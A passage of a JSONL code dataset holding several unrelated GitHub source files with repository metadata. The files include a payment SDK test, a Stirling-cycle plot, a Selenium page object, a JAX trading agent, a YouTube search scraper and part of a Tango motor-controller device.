os.environ['AP_CURRENCY_CODE'] = 'AP_CURRENCY_CODE'\n os.environ['AP_MWS_SECRET_KEY'] = 'AP_MWS_SECRET_KEY'\n\n client = AmazonPayClient(sandbox=True)\n self.assertEqual(client.region, 'na')\n self.assertEqual(client.mws_access_key, 'AP_MWS_ACCESS_KEY')\n self.assertEqual(client.mws_secret_key, 'AP_MWS_SECRET_KEY')\n self.assertEqual(client.merchant_id, 'AP_MERCHANT_ID')\n self.assertEqual(client.currency_code, 'AP_CURRENCY_CODE')\n\n os.environ['AP_REGION'] = 'AP_REGION'\n with self.assertRaises(KeyError):\n client = AmazonPayClient()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"amzn/amazon-pay-sdk-python","sub_path":"test/test_ap.py","file_name":"test_ap.py","file_ext":"py","file_size_in_byte":41394,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"48"} +{"seq_id":"40371265547","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 20 23:11:20 2022\nTD22 - Moteur de Stirling (https://fr.wikipedia.org/wiki/Moteur_Stirling)\n@author: remimetzdorff\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nV1m, V1M = 0, 0.0001\nV2m, V2M = 0, 0.0001\n\ndef V1(t):\n return (V1M-V1m) * np.cos(2*np.pi*t) / 2 + (V1M + V1m) / 2\n\ndef V2(t):\n return (V2M-V2m) * np.sin(2*np.pi*t) / 2 + (V2M + V2m) / 2\n\ndef V(t):\n return V1(t) + V2(t)\n\nt = np.linspace(0, 1, 1000)\nV_reel = V(t)\nVm, VM = min(V_reel), max(V_reel)\n\nT1, T2 = 300, 1000\nR = 8.314\nn = 1e5 * Vm / R / T1\nm = n * 29e-3\n\ndef P(t):\n n1 = n * T2/V2(t) / ( T1/V1(t) + T2/V2(t) )\n return n1 * R * T1 / V1(t)\n\nP_reel = P(t)\n\nt = np.linspace(0, 1, 1000)\nP_reel, V_reel = P(t), V(t)\nVm, VM = min(V_reel), max(V_reel)\nPa, Pb = n*R*T1/Vm, n*R*T2/Vm\nPc, Pd = n*R*T2/VM, n*R*T1/VM\n\nv = np.linspace(Vm, VM)\nv_rev = np.linspace(VM, Vm)\n\nPbc = Pb*Vm / v\nPda = Pa*Vm / v_rev\n\nV_mod = np.array([Vm, Vm] + list(v) + [VM, VM] + list(v_rev))\nP_mod = np.array([Pa, Pb] + list(Pbc) + [Pc, Pd] + list(Pda))\n\nplt.plot(V_reel/m, P_reel*1e-5, label=\"cycle 'réel'\")\nplt.plot(V_mod/m, P_mod*1e-5, label=\"cycle modèle\")\nplt.xlabel(\"Volume massique $v$ ($\\\\rm{kg \\cdot m^{-3}}$)\")\nplt.ylabel(\"Pression (bar)\")\nplt.title(\"Diagramme de Clapeyron d'un cycle de Stirling\")\nplt.xlim(0,6)\nplt.ylim(0,4)\nplt.legend()","repo_name":"remimetzdorff/mp2i","sub_path":"python/td22-stirling.py","file_name":"td22-stirling.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37241843352","text":"word_a = 'hello'\nword_b = 'world'\n\n# Sets of letters in the words;\n# each letter appears only once\nin_a = set(word_a)\nin_b = set(word_b)\n\n# Difference between the two sets\ncommon = in_a.intersection(in_b)\n\n# Also works for this task:\n# common = in_b.intersection(in_a)\n\n# Print common letters\nprint(common) # {'l', 'o'}\n","repo_name":"ash/amazing_python3","sub_path":"tasks/t-005.py","file_name":"t-005.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"4166520725","text":"import math\n\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom .locators import MainPageLocators\n\n\nclass BasePage:\n def __init__(self, browser, url):\n self.browser = browser\n self.url = url\n\n def open(self):\n self.browser.get(self.url)\n\n def is_element_present(self, how, what):\n try:\n self.browser.find_element(how, what)\n except NoSuchElementException:\n return False\n return True\n\n def is_not_element_present(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException). \\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def get_element(self, how, what):\n el = self.browser.find_element(how, what)\n assert el, 'element not found'\n return el\n\n def solve_quiz_and_get_code(self):\n alert = self.browser.switch_to.alert\n x = alert.text.split(\" \")[2]\n answer = str(math.log(abs((12 * math.sin(float(x))))))\n alert.send_keys(answer)\n alert.accept()\n try:\n alert = self.browser.switch_to.alert\n alert_text = alert.text\n print(f\"Your code: {alert_text}\")\n alert.accept()\n except NoAlertPresentException:\n print(\"No second alert presented\")\n\n def go_to_login_page(self):\n from pages import LoginPage\n link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n try:\n alert = self.browser.switch_to.alert\n alert.accept()\n except:\n pass\n return LoginPage(browser=self.browser, url=self.browser.current_url)\n\n def go_to_basket(self):\n from pages import BasketPage\n link = self.browser.find_element(*MainPageLocators.BASKET_LINK)\n link.click()\n return BasketPage(browser=self.browser, url=self.browser.current_url)\n\n def should_be_authorized_user(self):\n assert self.is_element_present(*MainPageLocators.USER_ICON), \"User not authorize\"\n\n def should_be_login_link(self):\n assert self.is_element_present(*MainPageLocators.LOGIN_LINK)\n","repo_name":"StuBz211/python-selenium-autotest","sub_path":"pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35337498205","text":"from lattice.wallet import *\nfrom lattice.market import *\nfrom lattice.broker import *\nfrom lattice.order import *\nfrom lattice.utils import logging\nfrom lattice.models import gnn\nfrom lattice.config import InvestorConfig\n\nimport jax\nimport jraph\nimport numpy as np\nimport haiku as hk\nfrom typing import List\nfrom pathlib import Path\nfrom abc import ABC, abstractmethod\n\n\ndef get_investor(wallet, market, broker, config):\n name = config[\"class\"]\n for cls in Investor.__subclasses__():\n if cls.__name__ == name:\n return cls(wallet, market, broker, config)\n raise ValueError(f\"There is no Investor subclass called {name}\")\n\n\nclass Investor:\n def __init__(\n self, wallet: Wallet, market: Market, broker: Broker, config: InvestorConfig\n ) -> None:\n self.__dict__.update(config)\n self.wallet = wallet\n self.market = market\n self.broker = broker\n\n def reset(self):\n self.market.reset()\n self.wallet.reset()\n self.broker.reset()\n\n def submit_orders(self, orders: List[Order], prices: Dict[str, float]) -> None:\n for order in orders:\n if self.wallet.can_afford(order):\n success = self.broker.place_order(order)\n if success:\n self.wallet.update_balance(order, prices)\n\n def cancel_orders(self, order_ids: List[str]) -> None:\n for oid in order_ids:\n self.broker.cancel_order(oid)\n\n @abstractmethod\n def evaluate_market(self):\n pass\n\n\nclass BernoulliInvestor(Investor):\n def __init__(self, wallet, market, broker, config) -> None:\n super().__init__(wallet, market, broker, config)\n self.hourly_limit = int(60 / 5)\n\n def evaluate_market(self) -> bool:\n\n # Check state of the market\n done, time, prices, features = self.market.get_state()\n\n # Select an action / make a decisions\n market_name = np.random.choice(self.market.markets)\n\n # Create an order\n if self.market.t % self.hourly_limit == 0:\n order = self.broker.market_order(\n market=market_name,\n side=np.random.choice([\"BUY\", \"SELL\"], p=self.p),\n size=0.1,\n open_price=prices[market_name],\n open_time=time,\n )\n else:\n order = None\n self.submit_orders([order], prices)\n return not done\n\n\nclass GNNInvestor(Investor):\n def __init__(self, wallet, market, broker, config) -> None:\n super().__init__(wallet, market, broker, config)\n self.seed = int(self.seed)\n self.weight_dir = paths.weights / self.name\n self.network = hk.without_apply_rng(hk.transform(gnn.network_definition))\n self.initialized = False\n self.action_map = {0: \"HOLD\", 1: \"BUY\", 2: \"SELL\"}\n\n if self.train:\n self.experience = logging.ExperienceBuffer()\n\n def set_params(self, graph: jraph.GraphsTuple) -> None:\n if not self.initialized:\n if self.weight_dir.exists():\n self.params = jax.numpy.load(self.weight_dir)\n else:\n self.params = self.network.init(jax.random.PRNGKey(self.seed), graph)\n self.weight_dir.parent.mkdir(exist_ok=True)\n self.save_params()\n self.initialized = True\n\n def save_params(self):\n jax.numpy.save(self.weight_dir, self.params)\n\n def get_actions(self, features, global_features) -> List[str]:\n graph = gnn.construct_graph(features=features, global_features=global_features)\n self.set_params(graph)\n self.graph = graph\n logits = self.network.apply(self.params, graph)\n actions = jax.random.categorical(\n key=jax.random.PRNGKey(self.seed), logits=logits\n )\n return actions.tolist()\n\n def evaluate_market(self) -> Union[bool, logging.ExperienceBuffer]:\n # Check state of the market\n done, time, prices, market_features = self.market.get_state()\n print(time)\n\n # Calling GNN model\n # TODO: Make these the proportions of cash and other tradable assets\n wallet_features = jax.numpy.array([[0.0, 0.0, 0.0]]) \n actions = self.get_actions(\n features=market_features, global_features=wallet_features\n )\n\n # Creating orders\n orders = [None]\n for i, market_name in enumerate(self.market.markets):\n action = self.action_map[actions[i]]\n if action == \"BUY\":\n order = self.broker.market_order(\n market=market_name,\n side=\"BUY\",\n size=0.01,\n open_price=prices[market_name],\n open_time=time,\n )\n elif action == \"SELL\":\n order = self.broker.market_order(\n market=market_name,\n side=\"SELL\",\n size=0.01,\n open_price=prices[market_name],\n open_time=time,\n )\n orders.append(order)\n self.submit_orders([order], prices)\n\n if self.train:\n self.experience.push(self.graph, actions)\n\n if done:\n history = self.wallet.get_history()\n wallet_values = history[\"total_value\"].values\n self.experience.reward_to_go(wallet_values, self.market.num_markets)\n return self.experience.state_action_reward()\n\n return not done\n","repo_name":"magi-1/lattice","sub_path":"lattice/investor.py","file_name":"investor.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10279494536","text":"import requests, logging, json, re, csv, os\nfrom urllib.parse import quote\nfrom datetime import datetime\n\n\n#USER CONFIG\nproxies = {\n\t#'https': 'ip:port', #you comment this line for disabling proxy\n}\n\n\n#logger settings\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nfileFMT = logging.Formatter(datefmt='%y-%m-%d %H:%M:%S', fmt='[%(asctime)s][%(module)s.py][%(funcName)s][%(levelname)s] %(message)s ')\nconsoleFMT = logging.Formatter(datefmt='%y-%m-%d %H:%M:%S', fmt = '[%(asctime)s] %(message)s')\nstream_handler = logging.StreamHandler()\nstream_handler.setLevel(logging.INFO)\nstream_handler.setFormatter(consoleFMT)\nlogger.addHandler(stream_handler)\n\nclass SearchParser:\n\tdef __init__(self, search_text, proxies={}):\n\t\tself.headers = {\n\t\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\",\n\t\t'x-youtube-client-name': '1',\n\t\t'x-youtube-client-version': '2.20200605.00.00',\n\t\t'Accept-Language': 'en-US,en;q=0.5'\n\t\t}\n\t\tself.proxies = proxies\n\t\tself.language = {'Accept-Language': 'en-US,en;q=0.5'}\n\t\tself.search_quote = quote(search_text)\n\t\tself.search_text = search_text\n\t\tself.page_template = 'https://www.youtube.com/results?search_query={}&page={}'\n\t\tself.session = requests.Session()\n\t\tself.result = {}\n\t\tself.result['videos'] = {}\n\t\tself.result['channels'] = {}\n\t\tself.result['playlists'] = {}\n\t\tself.result['movies'] = {}\n\t\tself.result['radios'] = {}\n\n\tdef get_json_content(self, page_number):\n\t\turl = self.page_template.format(self.search_quote, page_number)\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tpage = self.session.get(url, headers=self.language, proxies=self.proxies).text\n\t\t\t\tjson_text = re.findall(r'(\\{\"responseContext\".+\\{\\}\\}\\}|\\{\"responseContext\".+\"\\]\\})', page)[0]\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\tjson_content = json.loads(json_text)\n\t\treturn json_content\n\n\tdef parse_json_content(self, json_content):\n\t\tcontents = json_content['contents']['twoColumnSearchResultsRenderer']['primaryContents']['sectionListRenderer']['contents']\n\t\tneedReturn = False\n\t\t###########ANTI AD###########\n\t\titemSection = 0\n\t\tcontent_types = ['channelRenderer', 'playlistRenderer', 'movieRenderer', 'videoRenderer', 'messageRenderer', 'radioRenderer', 'horizontalCardListRenderer', 'shelfRenderer']\n\t\tcontents_found = False\n\t\twhile True:\n\t\t\tsection = contents[itemSection]\n\t\t\tif 'itemSectionRenderer' in section:\n\t\t\t\titemContents = section['itemSectionRenderer']['contents']\n\t\t\t\tfor content_type in content_types:\n\t\t\t\t\tif content_type in itemContents[0].keys():\n\t\t\t\t\t\tcontents = itemContents\n\t\t\t\t\t\tcontents_found = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif contents_found:\n\t\t\t\t\tbreak\n\t\t\t\titemSection += 1\n\t\t##############################\n\t\tfor content in contents:\n\t\t\tif 'channelRenderer' in content:\n\t\t\t\tchannel_title = content['channelRenderer']['title']['simpleText']\n\t\t\t\tchannelId = content['channelRenderer']['channelId']\n\t\t\t\tchannel_url = 'https://www.youtube.com/channel/' + channelId\n\t\t\t\tif 'Topic' not in channel_title:\n\t\t\t\t\tif 'videoCountText' in content['channelRenderer']:\n\t\t\t\t\t\tvideo_count = content['channelRenderer']['videoCountText']['runs'][0]['text'].replace(',', '')\n\t\t\t\t\t\tvideo_count = int(re.findall(r'\\d+', video_count)[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tvideo_count = 0\n\t\t\t\telse:\n\t\t\t\t\tvideo_count = None\n\n\t\t\t\tif 'subscriberCountText' in content['channelRenderer']:\n\t\t\t\t\tchannel_subscribers = content['channelRenderer']['subscriberCountText']['simpleText'].replace(',', '')\n\t\t\t\t\tif 'M' in channel_subscribers:\n\t\t\t\t\t\tchannel_subscribers = int(float(re.findall(r'(\\d+\\.\\d+|\\d+)', channel_subscribers)[0]) * 1000000)\n\t\t\t\t\telif 'K' in channel_subscribers:\n\t\t\t\t\t\tchannel_subscribers = int(float(re.findall(r'(\\d+\\.\\d+|\\d+)', channel_subscribers)[0]) * 1000)\n\t\t\t\t\telse:\n\t\t\t\t\t\tchannel_subscribers = int(re.findall(r'\\d+', channel_subscribers)[0])\n\t\t\t\telse:\n\t\t\t\t\tchannel_subscribers = 0\n\n\t\t\t\tself.result['channels'][channelId] = {}\n\t\t\t\tself.result['channels'][channelId]['title'] = channel_title\n\t\t\t\tself.result['channels'][channelId]['url'] = channel_url\n\t\t\t\tself.result['channels'][channelId]['video_count'] = video_count\n\t\t\t\tself.result['channels'][channelId]['subscribers'] = channel_subscribers\n\n\t\t\telif 'videoRenderer' in content:\n\t\t\t\tvideoId = content['videoRenderer']['videoId']\n\t\t\t\tself.result['videos'][videoId] = {}\n\t\t\t\tvideo_title = content['videoRenderer']['title']['runs'][0]['text']\n\t\t\t\tvideo_url = 'https://www.youtube.com/watch?v=' + videoId\n\t\t\t\tif 'upcomingEventData' in content['videoRenderer']:\n\t\t\t\t\ttime_stamp = int(content['videoRenderer']['upcomingEventData']['startTime'])\n\t\t\t\t\tscheduled_time = datetime.utcfromtimestamp(time_stamp).strftime('%Y/%m/%d %H:%M')\n\t\t\t\t\tvideo_published_time = 'scheduled for ' + scheduled_time\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tvideo_published_time = content['videoRenderer']['publishedTimeText']['simpleText']\n\t\t\t\t\texcept:\n\t\t\t\t\t\tvideo_published_time = 'music/live/unknown'\n\t\t\t\ttry:\n\t\t\t\t\tvideo_length = content['videoRenderer']['lengthText']['simpleText']\n\t\t\t\texcept:\n\t\t\t\t\tvideo_length = 'live/unknown'\n\t\t\t\tif 'upcomingEventData' in content['videoRenderer']:\n\t\t\t\t\tvideo_views = 0\n\t\t\t\telse:\n\t\t\t\t\tif 'viewCountText' in content['videoRenderer']:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tvideo_views = content['videoRenderer']['viewCountText']['simpleText'].replace(',', '')\n\t\t\t\t\t\t\tviews_match = re.search(r'[0-9]+', video_views)\n\t\t\t\t\t\t\tif views_match:\n\t\t\t\t\t\t\t\tvideo_views = int(views_match.group(0).replace(',', ''))\n\t\t\t\t\t\t\telif video_views == 'No views':\n\t\t\t\t\t\t\t\tvideo_views = 0\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tvideo_views = content['videoRenderer']['viewCountText']['runs'][0]['text'].replace(',', '')\n\t\t\t\t\t\t\tviews_match = re.search(r'[0-9]+', video_views)\n\t\t\t\t\t\t\tif views_match:\n\t\t\t\t\t\t\t\tvideo_views = int(views_match.group(0))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tvideo_views = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tvideo_views = None\n\t\t\t\tvideo_owner = content['videoRenderer']['ownerText']['runs'][0]['text']\n\t\t\t\tself.result['videos'][videoId]['title'] = video_title\n\t\t\t\tself.result['videos'][videoId]['url'] = video_url\n\t\t\t\tself.result['videos'][videoId]['published_time'] = video_published_time\n\t\t\t\tself.result['videos'][videoId]['video_length'] = video_length\n\t\t\t\tself.result['videos'][videoId]['views'] = video_views\n\t\t\t\tself.result['videos'][videoId]['video_owner'] = video_owner\n\t\t\telif 'playlistRenderer' in content:\n\t\t\t\tplaylistId = content['playlistRenderer']['playlistId']\n\t\t\t\tplaylist_url = 'https://www.youtube.com/playlist?list=' + playlistId\n\t\t\t\tplaylist_title = content['playlistRenderer']['title']['simpleText']\n\t\t\t\tplaylist_video_count = int(content['playlistRenderer']['videoCount'])\n\t\t\t\tself.result['playlists'][playlistId] = {}\n\t\t\t\tself.result['playlists'][playlistId]['title'] = playlist_title\n\t\t\t\tself.result['playlists'][playlistId]['url'] = playlist_url\n\t\t\t\tself.result['playlists'][playlistId]['video_count'] = playlist_video_count\n\t\t\telif 'movieRenderer' in content:\n\t\t\t\tmovieId = content['movieRenderer']['videoId']\n\t\t\t\tmovie_url = 'https://www.youtube.com/watch?v=' + movieId\n\t\t\t\tmovie_title = content['movieRenderer']['title']['runs'][0]['text']\n\t\t\t\tmovie_duration = content['movieRenderer']['lengthText']['simpleText']\n\t\t\t\tmetadata = ''\n\t\t\t\ttry:\n\t\t\t\t\tfor info in content['movieRenderer']['topMetadataItems']:\n\t\t\t\t\t\tmetadata += info['simpleText'] + '\\n'\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tfor info in content['movieRenderer']['bottomMetadataItems']:\n\t\t\t\t\t\tmetadata += info['simpleText'] + '\\n'\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\tself.result['movies'][movieId] = {}\n\t\t\t\tself.result['movies'][movieId]['title'] = movie_title\n\t\t\t\tself.result['movies'][movieId]['url'] = movie_url\n\t\t\t\tself.result['movies'][movieId]['duration'] = movie_duration\n\t\t\t\tself.result['movies'][movieId]['metadata'] = metadata\n\t\t\telif 'radioRenderer' in content:\n\t\t\t\tradio_title = content['radioRenderer']['title']['simpleText']\n\t\t\t\tradioId = content['radioRenderer']['playlistId']\n\t\t\t\tvideo_count = content['radioRenderer']['videoCountText']['runs'][0]['text']\n\t\t\t\tradio_url = 'https://www.youtube.com' + content['radioRenderer']['navigationEndpoint']['commandMetadata']['webCommandMetadata']['url']\n\t\t\t\tself.result['radios'][radioId] = {}\n\t\t\t\tself.result['radios'][radioId]['title'] = radio_title\n\t\t\t\tself.result['radios'][radioId]['url'] = radio_url\n\t\t\t\tself.result['radios'][radioId]['video_count'] = video_count\n\t\t\telif 'messageRenderer' in content:\n\t\t\t\tif content['messageRenderer']['text']['runs'][0]['text'] == 'No more results':\n\t\t\t\t\tneedReturn = True\n\t\tlogger.info('*' * 50)\n\t\tlogger.info('Current videos count: ' + str(len(self.result['videos'])))\n\t\tlogger.info('Current playlists count: ' + str(len(self.result['playlists'])))\n\t\tlogger.info('Current movies count: ' + str(len(self.result['movies'])))\n\t\tlogger.info('Current channels count: ' + str(len(self.result['channels'])))\n\t\tlogger.info('Current radios count: ' + str(len(self.result['radios'])))\n\t\tif needReturn:\n\t\t\treturn 'stop'\n\tdef start(self):\n\t\tlogger.info('Proxy: ' + self.proxies.get('https', 'no proxy'))\n\t\tpage_number = 1\n\t\tresult = None\n\t\tlogger.info('Parsing...')\n\t\twhile result == None:\n\t\t\tjson_content = self.get_json_content(str(page_number))\n\t\t\tresult = self.parse_json_content(json_content)\n\t\t\tpage_number += 1\n\t\tlogger.info('Search was parsed.')\n\t\tlogger.info(' - Videos : ' + str(len(self.result['videos'])))\n\t\tlogger.info(' - Playlists : ' + str(len(self.result['playlists'])))\n\t\tlogger.info(' - Channels : ' + str(len(self.result['channels'])))\n\t\tlogger.info(' - Movies : ' + str(len(self.result['movies'])))\n\t\tlogger.info(' - Radios : ' + str(len(self.result['radios'])))\n\t\treturn self.result\n\nif __name__ == '__main__':\n\tsearch_text = input('Enter search text: ').strip()\n\tsearchParser = SearchParser(search_text, proxies)\n\tresult = searchParser.start()\n\tdatetime_stmp = str(datetime.now().strftime('%Y-%m-%d %H-%M'))\n\tfolder_name = 'search parser ' + datetime_stmp\n\tos.mkdir(folder_name)\n\tchannels = result['channels']\n\tvideos = result['videos']\n\tradios = result['radios']\n\tplaylists = result['playlists']\n\tmovies = result['movies']\n\n\twith open('./' + folder_name + '/channels.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['channelId', 'title', 'url', 'video_count', 'subscribers'])\n\tfor channelId, metadata in channels.items():\n\t\twith open('./' + folder_name + '/channels.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([channelId, metadata['title'], metadata['url'], metadata['video_count'], metadata['subscribers']])\n\n\twith open('./' + folder_name + '/videos.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['videoId', 'title', 'url', 'published_time', 'video_length', 'views', 'video_owner'])\n\tfor videoId, metadata in videos.items():\n\t\twith open('./' + folder_name + '/videos.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([videoId, metadata['title'], metadata['url'], metadata['published_time'], metadata['video_length'], metadata['views'], metadata['video_owner']])\n\n\twith open('./' + folder_name + '/radios.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['radioId', 'title', 'url', 'video_count'])\n\tfor radioId, metadata in radios.items():\n\t\twith open('./' + folder_name + '/radios.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([radioId, metadata['title'], metadata['url'], metadata['video_count']])\n\n\twith open('./' + folder_name + '/playlists.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['playlistId', 'title', 'url', 'video_count'])\n\tfor playlistId, metadata in playlists.items():\n\t\twith open('./' + folder_name + '/playlists.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([playlistId, metadata['title'], metadata['url'], metadata['video_count']])\n\n\twith open('./' + folder_name + '/movies.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['movieId', 'title', 'url', 'duration', 'metadata'])\n\tfor movieId, metadata in movies.items():\n\t\twith open('./' + folder_name + '/movies.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([movieId, metadata['title'], metadata['url'], metadata['duration'], metadata['metadata']])\n\n\n\n","repo_name":"xeosin1/youtube_parsers","sub_path":"searchParser.py","file_name":"searchParser.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23211067051","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 8 14:49:24 2021\n\nController interface for a SmarAct axis\n\nNOTE: this version only support the ethernet version\n\n@author: Michele Devetta (michele.devetta@cnr.it)\n\"\"\"\n\nimport time\nimport math\nimport numpy as np\nimport threading\nimport PyTango as PT\nimport PyTango.server as PTS\nfrom SmarActUtils import MoveMode, CalibrationOptions, ReferencingOptions, AxisState, SensorType, BaseUnit\n# from SmarActUtils import ActuatorMode, PosMovementType\n\n\nclass SmarActPositioner(PTS.Device, metaclass=PTS.DeviceMeta):\n\n # proxy = PTS.device_property(dtype=str, doc=\"MCS2 proxy device\", mandatory=True)\n # axis = PTS.device_property(dtype=PT.DevShort, doc=\"MCS2 axis number\", mandatory=True)\n # autoreference = PTS.device_property(dtype=PT.DevBoolean, doc=\"Automatically reference upon startup\", mandatory=False, default_value=False)\n # polling = PTS.device_property(dtype=PT.DevULong, doc=\"Polling period in ms\", mandatory=False, default_value=500)\n proxy = PTS.device_property(dtype=str, doc=\"MCS2 proxy device\")\n axis = PTS.device_property(dtype=PT.DevShort, doc=\"MCS2 axis number\")\n autoreference = PTS.device_property(dtype=PT.DevBoolean, doc=\"Automatically reference upon startup\", default_value=False)\n polling = PTS.device_property(dtype=PT.DevULong, doc=\"Polling period in ms\", default_value=500)\n ref_reverse = PTS.device_property(dtype=PT.DevBoolean, doc=\"Invert referencing direction\", default_value=False)\n ref_movebefore = PTS.device_property(dtype=PT.DevDouble, doc=\"Relative move before starting referencing\", default_value=0.0)\n no_direct_control = PTS.device_property(dtype=PT.DevBoolean, doc=\"Forbid direct control with SmaractGUI\", default_value=False)\n\n# MoveMode = PTS.attribute(\n# label=\"Move mode\", dtype=PT.DevEnum, enum_labels=MoveMode.getEnum(),\n# access=PT.AttrWriteType.READ_WRITE, doc=\"Move mode\", fisallowed='IsProxyOnline')\n#\n# ActuatorMode = PTS.attribute(\n# label=\"Actuator mode\", dtype=PT.DevEnum, enum_labels=ActuatorMode.getEnum(),\n# access=PT.AttrWriteType.READ_WRITE, doc=\"Actuator mode\", fisallowed='IsProxyOnline')\n\n def init_device(self):\n \"\"\" Initialize device\n \"\"\"\n # Set INIT state\n self.set_state(PT.DevState.INIT)\n\n # Call parent init\n PTS.Device.init_device(self)\n\n # Work variables\n self._do_reference = False\n\n # Create proxy\n self.dev = PT.DeviceProxy(self.proxy)\n self.debug_stream(\"Proxy device {0} up and running\".format(self.dev.name()))\n\n try:\n self.initialize_device()\n self.set_state(PT.DevState.STANDBY)\n except PT.DevFailed as e:\n self.error_stream(\"Failed device init (Error: {0!s})\".format(e.args[0].desc))\n self.set_state(PT.DevState.FAULT)\n\n # Enable events on attributes\n self.Position.set_change_event(True, False)\n self.Velocity.set_change_event(True, False)\n self.Acceleration.set_change_event(True, False)\n self.MotionDone.set_change_event(True, False)\n self.IsCalibrated.set_change_event(True, False)\n self.IsReferenced.set_change_event(True, False)\n\n # Set polling time for State command\n self.poll_command(\"State\", 500)\n self.debug_stream(\"Configured events\")\n\n # Start polling thread\n self._terminate = False\n self._th = threading.Thread(target=self.PollingThread)\n self._th.start()\n\n def initialize_device(self):\n\n st = AxisState(self.dev.AxisState(self.axis))\n self.debug_stream(\"Axis {0:d} state is: {1:d}\".format(self.axis, st.getValue()))\n\n # Set move mode to absolute closed loop (the only mode supported yet)\n self.dev.SetMoveMode(np.array([self.axis, MoveMode.SA_CTL_MOVE_MODE_CL_ABSOLUTE], dtype=np.int32))\n\n # Set proper unit and conversion for position\n unit = BaseUnit(self.dev.GetBaseUnit(self.axis))\n resolution = self.dev.GetBaseResolution(self.axis)\n\n pos_pp = self.Position.get_properties()\n vel_pp = self.Velocity.get_properties()\n acc_pp = self.Acceleration.get_properties()\n if unit.isMeter():\n pos_pp.unit = \"um\"\n pos_pp.format = \"%.3f\"\n vel_pp.unit = \"um/s\"\n vel_pp.format = \"%.3f\"\n acc_pp.unit = \"um/s^2\"\n acc_pp.format = \"%.3f\"\n self._conv_factor = math.pow(10.0, resolution + 6)\n\n elif unit.isDegree():\n pos_pp.unit = \"deg\"\n pos_pp.format = \"%.6f\"\n vel_pp.unit = \"deg/s\"\n vel_pp.format = \"%.6f\"\n acc_pp.unit = \"deg/s^2\"\n acc_pp.format = \"%.6f\"\n self._conv_factor = math.pow(10.0, resolution)\n\n else:\n pos_pp.unit = \"n.a.\"\n vel_pp.unit = \"n.a.\"\n acc_pp.unit = \"n.a.\"\n self._conv_factor = 1.0\n\n self.Position.set_properties(pos_pp)\n self.Velocity.set_properties(vel_pp)\n self.Acceleration.set_properties(acc_pp)\n self.debug_stream(\"Configured units. Conversion factor is: {0:e}\".format(self._conv_factor))\n\n # Variable to store attributes\n self._pos = self.dev.GetPosition(self.axis) * self._conv_factor\n self._vel = self.dev.GetVelocity(self.axis) * self._conv_factor\n self._acc = self.dev.GetAcceleration(self.axis) * self._conv_factor\n self._mdone = not st.is_moving()\n self._iscal = st.is_calibrated()\n self._isref = st.is_referenced()\n self.debug_stream(\"Initialized attributes\")\n\n # Check if device is calibrated\n if not st.is_calibrated():\n self.debug_stream(\"Positioner not calibrated on INTI. Start calibration\")\n self.Calibrate()\n\n if self.autoreference and not st.is_referenced():\n self.Reference()\n\n def delete_device(self):\n \"\"\" Delete device\n \"\"\"\n try:\n self._terminate = True\n if self._th is not None:\n self._th.join()\n except Exception as e:\n self.debug_stream(\"Error: {0!s}\".format(e))\n\n def initialize_dynamic_attributes(self):\n 